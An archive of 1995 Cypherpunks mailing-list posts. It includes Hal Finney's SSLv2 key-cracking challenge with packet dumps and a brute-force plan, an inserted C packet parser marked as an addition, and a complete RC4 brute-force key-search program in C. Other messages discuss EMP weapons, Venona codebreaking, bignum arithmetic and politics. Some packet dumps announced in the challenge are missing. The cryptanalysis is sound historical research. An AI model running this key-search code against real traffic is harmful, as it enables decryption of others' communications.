0xae 0x50 0x32 0x1a 0xbb 0x66 0x50 

It is interpreted as follows:

0x80 0x55	Packet length, 85 bytes follow.
0x02		MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80	CIPHER-KIND
0x00 0x0b	CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40	ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00	KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0x0e...0x07	CLEAR-KEY-DATA [11 bytes]
0x8c...0x50	ENCRYPTED-KEY-DATA [64 bytes]
<none>		KEY-ARG-DATA

The 11 most significant bytes (88 bits) of "master key" information are
sent in the clear as the CLEAR-KEY-DATA.  The remaining 40 low-order
bits of the 128-bit master key are RSA encrypted using the server's
public key, expanding in the process to 64 bytes, and sent as the
ENCRYPTED-KEY-DATA.  No KEY-ARG-DATA is sent since RC4 doesn't need an
initialization vector.

Now that these packets have been exchanged, from this point on, all
packets are sent encrypted.  For each such packet, after the packet
length bytes there is a 16-byte Message Authentication Code (MAC).
Then comes the RC4 encrypted data itself.

Two different session keys are used, both generated from the master key,
the 16-byte challenge data, and the 16-byte connection ID data.  The
CLIENT-READ-KEY, used for data sent from server to client, is calculated
as:

	MD5 (MASTER-KEY, "0", CHALLENGE, CONNECTION-ID).

"0" is one byte of 0x30, ascii 0.

The CLIENT-WRITE-KEY, used for data sent from client to server, is
calculated as:

	MD5 (MASTER-KEY, "1", CHALLENGE, CONNECTION-ID).

"1" is one byte of 0x31, ascii 1.

MD5 produces 128 bits of output which are used directly as the key input
to the RC4 algorithm.

The next message, from server to client, is SERVER-VERIFY.  It is sent
encrypted:

0x80 0x21 0x37 0x68 0x3a 0x8c 0x7d 0x33 0xb2 0x2f 0xb9 0x66 0xeb 0xd2 0x63 0xcd
0xa7 0xed 0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58
0xbc 0xf0 0xf4 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0x37...0xed	MAC [16 bytes]
0x71		RC4 encrypted MSG-SERVER-VERIFY (0x05)
0xa0...0xf4	RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
		[16 bytes]

The first RC4 encrypted byte is MSG-SERVER-VERIFY (which has a value of
0x05).  This is followed by 16 bytes of challenge data from the first
client message, encrypted.  These 17 bytes represent known plaintext
which can be used to easily check any guessed RC4 CLIENT-READ-KEY.

Let me make this a little more clear.  The first RC4 encryption with the
CLIENT-READ-KEY, immediately after key setup, is as follows:

Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0xaf 0x84 0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75
0x51 

Ciphertext (from SERVER-VERIFY packet):

0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58 0xbc 0xf0
0xf4 

The next message in the protocol is CLIENT-FINISHED, sent encrypted from
client to server:

0x80 0x21 0xed 0x59 0x0a 0x2a 0x80 0x50 0x42 0xec 0xcd 0xed 0x6c 0x96 0x0a 0xab
0x5c 0x0e 0xed 0x55 0xc3 0x21 0x6e 0x34 0x26 0x5b 0x46 0x41 0x35 0x51 0xb7 0xaa
0xec 0x57 0x9f 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0xed...0x0e	MAC [16 bytes]
0xed		RC4 encrypted MSG-CLIENT-FINISHED (0x03)
0x55...0x9f	RC4 encrypted CONNECTION-ID from SERVER-HELLO [16 bytes]

This is the first message sent encrypted with the CLIENT-WRITE-KEY and
could also be used as known plaintext to check a guessed key.

The next message is SERVER-FINISHED, sent encrypted from server to
client:

0x80 0x21 0x79 0x84 0xc6 0xb6 0xde 0xf4 0x4c 0xd2 0x52 0x56 0xdc 0x58 0x23 0xa0
0xfa 0x4d 0x06 0x7d 0x4c 0x12 0x32 0x32 0xea 0xaa 0x5a 0xb6 0xa7 0xb8 0x1a 0x66
0xeb 0x65 0x56 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0x79...0x4d	MAC [16 bytes]
0x06		RC4 encrypted MSG-SERVER-FINISHED (0x06)
0x7d...0x56	RC4 encrypted SESSION-ID-DATA [16 bytes]

The SESSION-ID-DATA has not been previously sent in the clear.  It would
be used to cache the key info for a future session.

From here on out, the handshaking is done.  Every message sent will be
encrypted and packetized.  The first two bytes are packet length, then
16 bytes of MAC, then the data.

First data message from client to server.  Presumably it is an http "GET"
request, with form information embedded in the URL.  This is the main one
to try decrypting (starting with 0x6b as the first encrypted byte).


This is the first data packet response from the server:


Here is the second data packet response from the server:


This ends the communication.

To try to attack this, the most effective approach would be to calculate
CLIENT-READ-KEY by trying all possible values for the 40 least
significant bits of the MASTER-KEY, and feeding that into the MD5
formula.  Then use the known plaintext in the SERVER-VERIFY message to
check the result.  Once the proper 40 bit value is found,
CLIENT-WRITE-KEY can easily be calculated and the data messages
decrypted.

Good luck!

Hal Finney
hfinney@shell.portal.com
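
The record layout described in the message above (two length bytes, 16 bytes of MAC, then the encrypted data) can be checked mechanically against the two FINISHED packets it quotes. The C below is an added example, not part of the original post; the type and function names are made up for illustration. Only the two-byte header with the top bit set, the form every packet in this capture uses, is handled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SSL2_MAC_LEN 16            /* MAC size stated in the message */

enum ssl2_status {
    SSL2_OK = 0,
    SSL2_TRUNCATED,                /* fewer bytes captured than the header claims */
    SSL2_UNSUPPORTED_HEADER,       /* top bit clear: not the form seen in this capture */
    SSL2_NO_ROOM_FOR_MAC           /* body shorter than the 16-byte MAC */
};

/* One parsed record; the pointers refer into the caller's buffer. */
struct ssl2_record {
    size_t body_len;               /* bytes following the 2-byte header */
    const uint8_t *mac;            /* SSL2_MAC_LEN bytes */
    const uint8_t *data;           /* encrypted bytes after the MAC */
    size_t data_len;
};

/* CLIENT-FINISHED and SERVER-FINISHED packets, copied from the message. */
static const uint8_t client_finished[] = {
    0x80, 0x21, 0xed, 0x59, 0x0a, 0x2a, 0x80, 0x50, 0x42, 0xec, 0xcd, 0xed,
    0x6c, 0x96, 0x0a, 0xab, 0x5c, 0x0e, 0xed, 0x55, 0xc3, 0x21, 0x6e, 0x34,
    0x26, 0x5b, 0x46, 0x41, 0x35, 0x51, 0xb7, 0xaa, 0xec, 0x57, 0x9f
};
static const uint8_t server_finished[] = {
    0x80, 0x21, 0x79, 0x84, 0xc6, 0xb6, 0xde, 0xf4, 0x4c, 0xd2, 0x52, 0x56,
    0xdc, 0x58, 0x23, 0xa0, 0xfa, 0x4d, 0x06, 0x7d, 0x4c, 0x12, 0x32, 0x32,
    0xea, 0xaa, 0x5a, 0xb6, 0xa7, 0xb8, 0x1a, 0x66, 0xeb, 0x65, 0x56
};

/* Parse one record from buf. rec and consumed are written only on SSL2_OK. */
enum ssl2_status ssl2_parse_record(const uint8_t *buf, size_t len,
                                   struct ssl2_record *rec, size_t *consumed)
{
    size_t body_len;

    if (len < 2)
        return SSL2_TRUNCATED;
    if (!(buf[0] & 0x80))
        return SSL2_UNSUPPORTED_HEADER;

    /* 0x80 0x21 -> 0x0021 = 33 bytes follow, as in the message */
    body_len = ((size_t)(buf[0] & 0x7f) << 8) | buf[1];
    if (body_len > len - 2)
        return SSL2_TRUNCATED;
    if (body_len < SSL2_MAC_LEN)
        return SSL2_NO_ROOM_FOR_MAC;

    rec->body_len = body_len;
    rec->mac = buf + 2;
    rec->data = buf + 2 + SSL2_MAC_LEN;
    rec->data_len = body_len - SSL2_MAC_LEN;
    *consumed = 2 + body_len;
    return SSL2_OK;
}

const char *status_name(enum ssl2_status st)
{
    switch (st) {
    case SSL2_OK:                 return "ok";
    case SSL2_TRUNCATED:          return "truncated";
    case SSL2_UNSUPPORTED_HEADER: return "unsupported header";
    case SSL2_NO_ROOM_FOR_MAC:    return "no room for MAC";
    default:                      return "unknown";
    }
}

void report(const char *label, const uint8_t *buf, size_t len)
{
    struct ssl2_record rec;
    size_t used = 0;
    enum ssl2_status st = ssl2_parse_record(buf, len, &rec, &used);

    if (st != SSL2_OK) {
        printf("%-16s rejected: %s\n", label, status_name(st));
        return;
    }
    printf("%-16s body=%zu  MAC=%02x..%02x  first data byte=%02x  data bytes=%zu\n",
           label, rec.body_len, rec.mac[0], rec.mac[SSL2_MAC_LEN - 1],
           rec.data_len ? rec.data[0] : 0, rec.data_len);
}

int main(void)
{
    report("CLIENT-FINISHED", client_finished, sizeof client_finished);
    report("SERVER-FINISHED", server_finished, sizeof server_finished);
    /* Constructed failure case: the same packet cut off after 20 bytes. */
    report("truncated copy", client_finished, 20);
    return 0;
}
```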




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 12 Jul 95 10:19:00 PDT
To: cypherpunks@toad.com
Subject: My only words on "Electromagnetic Pulse" Damage
Message-ID: <ac294be5040210042e73@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Much discussion this morning about EMP, electromagnetic pulse weapons, HERF
guns, Winn Schwartau's "Information Warfare" scenarios, TEMPEST, etc.

Not closely related to Cypherpunks themes, but lots of speculation is
continuing. I happen to know a fair amount about chip vulnerability to
various kinds of radiation and electrostatic discharge, and have had
contacts with folks who know Schwartau. (I was also interviewed for a
Schwartau-oriented BBC television program called "The I-Bomb.")

Here's what I know:

* EMP can of course zap devices. High electric field gradients can induce
voltage drops that blow inputs, burn out circuits, etc. Lots of mechanisms
for this, of course. Latch-up in CMOS circuits, field oxide overvoltage
breakdown, etc. There is an entire sub-industry devoted to electrostatic
discharge (ESD), with conferences, products, consulting services, etc.

* However, getting the voltages coupled into circuits is another matter.
Modern chips can usually handle static charge buildups that are in the tens
of thousands of volts range (input protection devices are on the input
pads). Static discharge should be avoided (wrist straps, etc.), but most
modern devices will survive the static discharges that folks can generate.

* The point? A _distant_ (tens of meters away) source of electromagnetic
fields will have a pretty hard time of creating field gradients able to
equal these 10,000 volt local fields caused routinely by static buildup.
(Electric fields are of course measured in terms of "volts per meter"...do
the math.)

* The traditional EMP work is well-covered in each year's "Nuclear and
Space Radiation Effects Conference," the Proceedings of which are included
in the December issue each year of "IEEE Transactions on Nuclear Science
and Space Radiation Effects." I advise anyone interested in this topic to
consult these sources. (I've been to a few of these conferences, beginning
in 1978.)

* Most of the traditional EMP work is oriented toward the detonation of
nukes in orbit, where the interaction of the photons from the bomb with
electrons in the upper atmosphere creates an electromagnetic field of
millions of volts per meter, the so-called "electromagnetic pulse" that
blows circuits. (This effect was apparently first noticed, by U.S.
scientists at least, after a 1962 high altitude burst over Johnston Atoll in
the Pacific, with electric circuits as far away as Hawaii being blown.)

* Schwartau has not, to my knowledge, ever seen a direct demonstration of
the effects he is describing in his book. In fact, much of his "HERF gun"
stuff is admittedly speculative.

* He has gotten interest from British intelligence (MI-5 or MI-6, not sure
which) in his "scenarios" for knocking out financial centers with EMP bombs
and HERF guns. A friend of mine, who can speak up if he wishes here, has
had some contacts with Schwartau and may have started to do some
preliminary experiments on this stuff.

(The EMP/HERF folks in governments have of course a lot of experience here.
I'm just saying that the "Schwartau crowd" appears to just be getting
started on actual experiments, so any speculations in "Information Warfare"
should be taken as just that, as speculations.)

* As a matter of commenting on one thread about damage to the "HERF gun"
itself, the conventional notion is that such a device would be a "set and
forget" device, with a suitcase planted near a corporate office complex and
set to "detonate" some time later. All the talk about reuse and damage to
the operator is beside the point. (As is the speculation about effects on
the human body....bodies can withstand incredibly high fields, so long as
a ground path for current does not form (electrocution)....I could go on
about this, but won't.)

* In my opinion, Schwartau's chief interest is in spreading fear and
concern about the "vulnerability" of the world's "information
infrastructure." This cranks up interest in his book, in getting talk show
interviews, etc. He may have "patriotic" motives as well, but I think a
large part of what we're seeing is the usual, and increasingly common,
journalistic hype.

This is not to say there is no basis for concern, just that this is not the
first and foremost concern. After all, cutting power lines has long been an
easy way to knock out economic activity--it may have recently happened in
Penang, Malaysia, for example, where many chip assembly plants were knocked
off-line for a few weeks by a power cable cut.

This is all I'll say on the current debate on TEMPEST, HERF, EMP, etc.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 12 Jul 95 08:26:32 PDT
To: perry@imsi.com
Subject: Re: QED_jak
In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
Message-ID: <9507121524.AA06294@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Could it be that they were using the pads more than once?  That's the
simplest flaw I can imagine.

Also:

 > >       one of its oldest secrets: how a small team of
 > >       codebreakers found the first clues that the Soviet Union
 > >       sought to steal the blueprints for the atomic bomb in
 > >       World War II.

Gee, why did it take a squad of codebreakers to come to the conclusion
that the Soviets sought to steal atomic secrets?  I mean, couldn't
they just kinda scratch their heads and decide it was highly unlikely
that the Soviets *wouldn't* do it?  And why would they need to "crack"
the code at all?  Seems like they could do some controlled information
leaks and then do some traffic flow analysis via whatever known
communications channels operatives were believed to use; all they
needed was grounds for suspicion, after all.

I assume there's a lot about this not revealed yet, or not clear from
the brief synopsis above.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 12 Jul 95 07:28:16 PDT
To: John Young <jya@pipeline.com>
Subject: Re: QED_jak
Message-ID: <199507121427.KAA09285@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 7/12/95 -0400, John Young wrote:
>   7-12-95. NYPaper:
>
>
>   "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
>   Clues That Led to Code-Breaking."
>
>      The American intelligence establishment today unveiled
>      one of its oldest secrets: how a small team of
>      codebreakers found the first clues that the Soviet Union
>      sought to steal the blueprints for the atomic bomb in
>      World War II.  Using just brain power -- no computers,
>      no stolen skeleton keys -- the cryptographers slowly
>      cracked what was thought to be an unbreakable code. 


>      service.  The messages were like a jigsaw puzzle with a
>      billion pieces -- all black. They had been double-coded
>      by a system called a one-time pad -- a unique random
>      code for each message, converting words to numbers in a
>      pattern used only once.                        HOO_doo

Note Julius Rosenberg's code name was "liberal".

The NSA said that the Soviets were using a one-time-pad.  The implication is that sloppy encryption practice caused Soviet code clerks to sometimes reuse the random material thus converting the code into a code book system that could be read.

DCF

"A man perfects himself by working. Foul jungles are cleared
away, fair seed-fields rise instead, and stately cities; and withal
the man himself first ceases to be a jungle, and foul unwholesome
desert thereby. . . . The man is now a man." -- Carlyle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 09:35:03 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
Message-ID: <Pine.3.89.9507121027.B1475-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:

> Go see Winn Schwartau talk about HERF guns sometime. He passed around
> a picture of a device for < US$500 that could crash any computer within
> 50 yards..  Then again, it isn't too good for the person firing the gun
> either.. (mega EM emissions).

That all depends on the power level, and the emission pattern of the 
device, and the frequency.  I've been working within 10 feet of a dipole 
being fed by a 1kW amplifier before, and it didn't make me sterile (but 
it might've loosened a filling or two <grin>).

> The parts are available if you know what to get. a VERY enlightening
> and frightening presentation. I don't think he personally has built one.
> His presentation contained a presentation on TEMPEST emissions, and
> low level EM field effects on sensitive equipment problems too (a PBS
> documentary - a VERY compelling presentation of why you should never
> use walkman/CD players/radios/electronics equipment on airplanes if
> they say not to, and you value your life)

This sounds like absolute propaganda.  If you do the calculations, you'll 
see that a 1 watt transmitter sitting 100 feet away from your target will 
generate an EMF less than that 1000kW ERP TV transmitter array you just 
flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
falling out of the sky, and we don't.  Add to that the HF and VHF 
transmitting equipment in the cockpit, plus the microwave ovens in the 
fore and aft, PLUS the phones they have on the plane, and it adds up to a 
sizeable amount of RF bouncing around the cabin without you and your 2m 
talkie with its 6 dB loss rubber duckie.

Now, if every passenger fired up their 2m talkies, that might pose a 
problem, but then again every passenger wouldn't be using one, would they?

Again, sounds like "we want to totally control your environment for your 
safety (actually, to minimize our liability)" crap.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 07:44:40 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
Message-ID: <9507121444.AA10523@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> Go see Winn Schwartau talk about HERF guns sometime. He passed around
> a picture of a device for < US$500 that could crash any computer within
> 50 yards.

If it costs that little, I'd like to see one demonstrated. I've heard
of no demonstrations of such things.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 07:45:17 PDT
To: John Young <jya@pipeline.com>
Subject: Re: QED_jak
In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
Message-ID: <9507121445.AA10531@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
>    Clues That Led to Code-Breaking."
> 
>       The American intelligence establishment today unveiled
>       one of its oldest secrets: how a small team of
>       codebreakers found the first clues that the Soviet Union
>       sought to steal the blueprints for the atomic bomb in
>       World War II.  Using just brain power -- no computers,
>       no stolen skeleton keys -- the cryptographers slowly
>       cracked what was thought to be an unbreakable code. 

The reports claimed the spies were using one time pads in some flawed
manner, but did not explain very well what the problem was. Does
anyone out there know?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 12 Jul 95 07:48:40 PDT
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Moby ints [Re: Num Rat]
In-Reply-To: <199507120139.SAA07236@shell1.best.com>
Message-ID: <199507121448.KAA06858@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote:
> > However, it's only worthwhile for large
> > numbers (>512 bits). At n=512, if your bigints are stored as polynomials
> > with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
> > (so the FFT method and the Karatsuba method are equivalent for numbers
> > of that size)
> 
> I conjecture that the constant factor is rather smaller for the 
> Karatsuba method, so the turnover should be somewhat higher than
> 512 bits.

  True, the Karatsuba method does seem "simpler" than a fast Fourier
transform (for which a naive implementation would use complex math), however
Karatsuba has some hidden costs which the FFT technique doesn't. Karatsuba
requires dynamically resized integers. (i.e. when you split into subproblems,
you have to rescale to n/2 bit integers) Karatsuba also has to do several
big_int additions per subproblem that the FFT doesn't. If the FFT-Poly
routine is done over a prime field, and it is coded iteratively, it just
might come close to Karatsuba for small n. I am not aware of any 
experimental data, but I am working on the implementation of a high
performance portable big_int library right now, and I'll be doing
some data collecting. 

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 12 Jul 95 02:55:39 PDT
To: cypherpunks@toad.com
Subject: general RC4 key searcher: optimisations anyone?
Message-ID: <Pine.SOL.3.91.950712102618.28272C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

The following program is the part of my RC4 key search program that
actually does the searching, adapted into a small speed test.  It is
designed to handle any size key, with any number of unknown bits, in any
position within the key.  There are, of course, problems with it in its 
current form:


1.  It's too slow.  I get 50% of the performance of the bruterc4.c on 
    utopia.hacktic.nl (~9500/sec on a 60MHz Pentium and ~12000/sec on a 
    Sparc 20)

2.  It can only handle bit offsets of 0 (i.e. the lower n bits of the key 
    are unknown).  I'm unsure of a really fast way of generalising this 
    to any (contiguous) n bits.

3.  There are probably bugs.


The code is included below.  Does anyone have any comments?


- Andy

--------------------------- begin code fragment ------------------------

/* RC4 Brute Force Key Searcher, by Andy Brown 1995
   
   This part of the package is meant to be portable between most systems
   so that Unix users can take part in the searching.  After all, the
   kind of really high powered systems that can make a large dent in the
   key space are not running Windows NT.  You will, however, require
   an ANSI compiler */


#include <stdio.h>
#include <stdlib.h>   /* malloc, free */
#include <string.h>   /* strlen, memset, memcpy */
#include <time.h>
#include <ctype.h>

/* function declarations */

int main(void);
char *search_range(char *,unsigned long,unsigned long,char *,int,
                   unsigned char *,unsigned char *,int);

static void hex_to_bytes(char *,unsigned char *);


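/* swap through a temporary: the XOR trick zeroes the byte when both
   arguments name the same element, which happens whenever the two RC4
   indices coincide */
#define SwapByte(a,b) do { unsigned char t_=(a); (a)=(b); (b)=t_; } while(0)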
#define hexdigit(a) ((a)<10 ? (a)+'0' : (a)-10+'A')
#define decdigit(a) (isdigit(a) ? (a)-'0' : toupper(a)-'A'+10)


/*****************************/
/* Main function: test speed */
/*****************************/

int main(void)
{
/* The key has 20 "unknown" bits */

  char *keyhex="0102030405060708090A0B0C0D000000";
  char *first="0";
  unsigned char ciphertext[11]=
    { 0xF2,0xA2,0xA0,0xF6,0x0F,0xBD,0x69,0x98,0xC0,0xFF,0x4C };

  char *retval;
  time_t before,diff;

  before=time(NULL);
  retval=search_range(first,0xFFFFF,0,keyhex,0,
                      (unsigned char *)"hello world",ciphertext,11);
  diff=time(NULL)-before;
  if(diff<1)
    diff=1;   /* a fast machine can finish within a second; avoid dividing by zero */

  if(retval==NULL)
    fprintf(stderr,"Key not found, bug in key search code\n");
  else
    fprintf(stderr,"Key is: %s\n%ld keys/sec\n",retval,0xFFFFFL/(long)diff);

  return 0;
}


/***********************************/ 
/* Search a region of the keyspace */
/***********************************

Arguments:
  start_str:  ASCII hex representation of the first "search key"
  testsl:     low order 32 bits of the number of keys to test
  testsh:     high order 32 bits of the number of keys to test
  keyhex:     ASCII hex representation of the key "skeleton"
              Zeros appear in the key throughout the search range
  firstbit:   zero based index of the first unknown bit
  plaintext:  known plaintext
  ciphertext: corresponding ciphertext
  textsize:   number of bytes of plain/ciphertext

NB: A "search key" is an offset into the searchable keyspace, not
    a full key in itself.  It may vary from 0..(2^numbits)-1

Returns:
  NULL if the key is not found in the search range, otherwise an ASCII
  hex representation of the key is returned.  This pointer must be
  dynamically allocated with malloc
*/

char *search_range(char *start_str,unsigned long testsl,unsigned long testsh,
		   char *keyhex,int firstbit,
                   unsigned char *plaintext,unsigned char *ciphertext,
		   int textsize)
{
  unsigned char *start,*key,*skeleton,state[256],index1,index2;
  char *retval;
  int keybytes,startbytes,x,y,counter,i,found=0;
  unsigned long lowcounter,highcounter;

/* allocate space for the key bytes and our starting value */

  keybytes=strlen(keyhex)/2;
  if(strlen(keyhex)&1)
    keybytes++;

  startbytes=strlen(start_str)/2;
  if(strlen(start_str)&1)
    startbytes++;

  start=(unsigned char *)malloc(keybytes);
  memset(start,'\0',keybytes);
  skeleton=(unsigned char *)malloc(keybytes);
  key=(unsigned char *)malloc(keybytes);

/* convert the hex strings to bytes */

  hex_to_bytes(start_str,start+keybytes-startbytes);
  hex_to_bytes(keyhex,skeleton);

/* OK, now things get time-critical.  We are about to drop into a loop
   that prepares and tests each candidate key */

  for(highcounter=0;highcounter<=testsh;highcounter++)
  {
    for(lowcounter=0;lowcounter<testsl;lowcounter++)
    {
    /* construct the key from the skeleton and our part */

      if(!firstbit)
      {
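	memcpy(key,skeleton,keybytes);
	/* merge every byte of the search offset; stopping above startbytes
	   skips it entirely when the offset is as long as the key */
	for(i=keybytes-1;i>=0;i--)
	  key[i]|=start[i];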
      }

    /* prepare the key */

      for(counter=0;counter<256;counter++)
	state[counter]=(unsigned char)counter;

      x=y=0;
      index1=index2=0;             

      for(counter=0;counter<256;counter++)
      {
	index2=(key[index1]+state[counter]+index2) & 0xFF;
      	SwapByte(state[counter],state[index2]);

      	if(++index1==keybytes)
	  index1=0;
      }

/* do two RC4 operations as a preliminary test.  If this fails then test
   the next one, then the rest.  This should result in a lot of rejections
   before the rest of the loop is entered */

      x=(x+1) & 0xFF;
      y=(state[x]+y) & 0xFF;
      SwapByte(state[x],state[y]);
      if(plaintext[0]==(ciphertext[0]^state[(state[x]+state[y]) & 0xFF]))
      {
	x=(x+1) & 0xFF;
      	y=(state[x]+y) & 0xFF;
      	SwapByte(state[x],state[y]);
      	if(plaintext[1]==(ciphertext[1]^state[(state[x]+state[y]) & 0xFF]))
      	{

      /* rest of the loop.  This will only be entered, on average once
	 every 65536 tests */

	  for(i=2;i<textsize;i++)
	  {
	    x=(x+1) & 0xFF;
	    y=(state[x]+y) & 0xFF;
	    SwapByte(state[x],state[y]);
	    if(plaintext[i]!=(ciphertext[i]^state[(state[x]+state[y]) & 0xFF]))
	      break;
	  }

	/* if we got to the end of the loop then that's it.  We have won */

	  if(i==textsize)
	  {
	    found=1;
      	    goto endloops;
	  }
      	}
      }
  
    /* increment our key segment */

      i=keybytes-1;
      do
      {
      	start[i]++;
      } while(!start[i--] && i>=0);   /* carry, but never index below start[0] */
    }
  }

/* free memory */

endloops:
  free(start);
  free(skeleton);

  if(found)
  {
    retval=(char *)malloc((keybytes*2)+2);
    for(i=0;i<keybytes;i++)
    {
      retval[i*2]=hexdigit((key[i]&0xF0)>>4);
      retval[(i*2)+1]=hexdigit(key[i]&0xF);
    }
    retval[i*2]='\0';
  }
  else
    retval=NULL;

  free(key);   /* the candidate key buffer was never released */
  return retval;
}


/*******************************/
/* convert hex string to bytes */
/*******************************

eg. "05FC9" would become 0x00,0x5F,0xC9 */

static void hex_to_bytes(char *str,unsigned char *bytes)
{
  int i,firstzero=(strlen(str)&1) ? 1 : 0;
  unsigned char b;

  i=0;
  while(i<(int)strlen(str))
  {
    if(firstzero)
    {
      firstzero=0;
      b=0;   /* odd-length string: the implied leading nibble is zero */
    }
    else
    {
      b=(decdigit(str[i]))<<4;
      i++;
    }
    b|=decdigit(str[i]);
    *bytes++=b;
    i++;
  }
}
-------------------------- end code fragment -----------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 12 Jul 95 10:56:30 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507121754.KAA19611@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote:
>
>
>And why, pray tell, did you repost this here?

Presumably because government instruments of repression are entirely
relevant to the Cypherpunks list.

I, for one, am much relieved to know that if I avoid conforming
to targeted stereotypes, I am unlikely to be incinerated by 
federal agencies.
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 12 Jul 95 11:12:19 PDT
To: cypherpunks@toad.com
Subject: Dr. Seuss, Technical Writer
Message-ID: <199507121756.KAA04759@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




              What If Dr. Seuss Did Technical Writing?
     
Here's an easy game to play.
Here's an easy thing to say:
    
If a packet hits a pocket on a socket on a port, 
And the bus is interrupted as a very last resort,
And the address of the memory makes your floppy disk abort, 
Then the socket packet pocket has an error to report!
     
If your cursor finds a menu item followed by a dash,
And the double-clicking icon puts your window in the trash, 
And your data is corrupted 'cause the index doesn't hash,
Then your situation's hopeless, and your system's gonna crash!
     
You can't say this?
What a shame sir!
We'll find you
Another game sir.
    
If the label on the cable on the table at your house,
Says the network is connected to the button on your mouse, 
But your packets want to tunnel on another protocol, 
That's repeatedly rejected by the printer down the hall,
     
And your screen is all distorted by the side effects of gauss 
So your icons in the window are as wavy as a souse,
Then you may as well reboot and go out with a bang, 
'Cause as sure as I'm a poet, the sucker's gonna hang!
     
When the copy of your floppy's getting sloppy on the disk, 
And the microcode instructions cause unnecessary risc,
Then you have to flash your memory and you'll want to RAM your ROM. 
Quickly turn off the computer and be sure to tell your mom!


 
